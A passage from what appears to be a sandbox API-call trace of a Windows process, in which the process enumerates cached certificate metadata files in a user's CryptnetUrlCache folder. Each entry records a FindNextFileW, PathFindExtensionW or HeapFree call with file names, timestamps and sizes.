ftCreationTime.dwLowDateTime=0xefaf7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefaf7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaec313e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", cAlternateFileName="7D266D~1")) returned 1 [0098.068] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned="" [0098.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.068] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6056b480, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6056b480, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1ef687a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", cAlternateFileName="8059E9~3")) returned 1 [0098.068] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned="" [0098.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.068] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x611ea800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x611ea800, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaecc9960, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", cAlternateFileName="80273C~1")) returned 1 [0098.068] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned="" [0098.068] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.068] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58e24200, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58e24200, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9f5f40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", cAlternateFileName="8059E9~2")) returned 1 [0098.068] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned="" [0098.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.069] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61236ac0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61236ac0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3b0b01a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", cAlternateFileName="809279~1")) returned 1 [0098.069] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned="" [0098.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.069] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5836df00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5836df00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f739c0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", cAlternateFileName="8059E9~1")) returned 1 [0098.069] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned="" [0098.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.069] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x62378a40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x62378a40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9a9c80, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", cAlternateFileName="80E4BE~1")) returned 1 [0098.069] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned="" [0098.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.069] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x613675c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x613675c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69bba4a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", cAlternateFileName="803B9E~1")) returned 1 [0098.069] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned="" [0098.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.069] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x63c50fe0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x63c50fe0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb100bf40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", cAlternateFileName="803D37~1")) returned 1 [0098.069] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned="" [0098.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.069] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61021780, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61021780, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb1058200, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", cAlternateFileName="8059E9~4")) returned 1 [0098.069] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned="" [0098.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.069] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x636a9ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x636a9ba0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb139e040, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", cAlternateFileName="800D31~1")) returned 1 [0098.069] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned="" [0098.069] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.069] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x581f7ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x581f7ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f4d860, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x180, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", cAlternateFileName="828298~1")) returned 1 [0098.069] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned="" [0098.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.070] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xec3c5340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec3c5340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xb16257a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", cAlternateFileName="8828F3~1")) returned 1 [0098.070] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned="" [0098.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.070] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x8064ac00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x8064ac00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80670d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", cAlternateFileName="8828F3~2")) returned 1 [0098.070] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned="" [0098.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.070] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6aa2c0a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6aa2c0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xadf19ae0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x196, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cAlternateFileName="8E4E51~1")) returned 1 [0098.070] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned="" [0098.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.070] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbf0dd70, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x156, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0098.070] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned="" [0098.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.070] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6a83cec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a83cec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaebe5120, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", cAlternateFileName="955CAB~1")) returned 1 [0098.070] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned="" [0098.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.070] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf3f73d0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf3f73d0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf3f73d0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", cAlternateFileName="9BC2FF~1")) returned 1 [0098.070] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned="" [0098.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.070] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe06277d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe06277d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xb15d94e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", cAlternateFileName="9C888B~1")) returned 1 [0098.070] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned="" [0098.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.070] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe07ca6f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe07ca6f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0x965accc0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", cAlternateFileName="9C888B~2")) returned 1 [0098.071] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned="" [0098.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.071] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54bc3730, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54bc3730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb11d4fc0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", cAlternateFileName="A9E4F7~1")) returned 1 [0098.071] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned="" [0098.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.071] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bfe570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bfe570, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe9b34f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", cAlternateFileName="ACF244~1")) returned 1 [0098.071] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned="" [0098.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.071] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe04aaa10, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe04aaa10, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xae4e7080, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", cAlternateFileName="B3BB9C~2")) returned 1 [0098.071] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned="" [0098.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.071] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefc01b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefc01b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaa4ee1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", cAlternateFileName="B3BB9C~1")) returned 1 [0098.071] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned="" [0098.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.071] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54322770, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54322770, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x204, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", cAlternateFileName="BC570E~2")) returned 1 [0098.071] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned="" [0098.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.071] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x204, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", cAlternateFileName="BC570E~1")) returned 1 [0098.071] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned="" [0098.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.071] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56bb3b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x56bb3b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaeca3800, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", 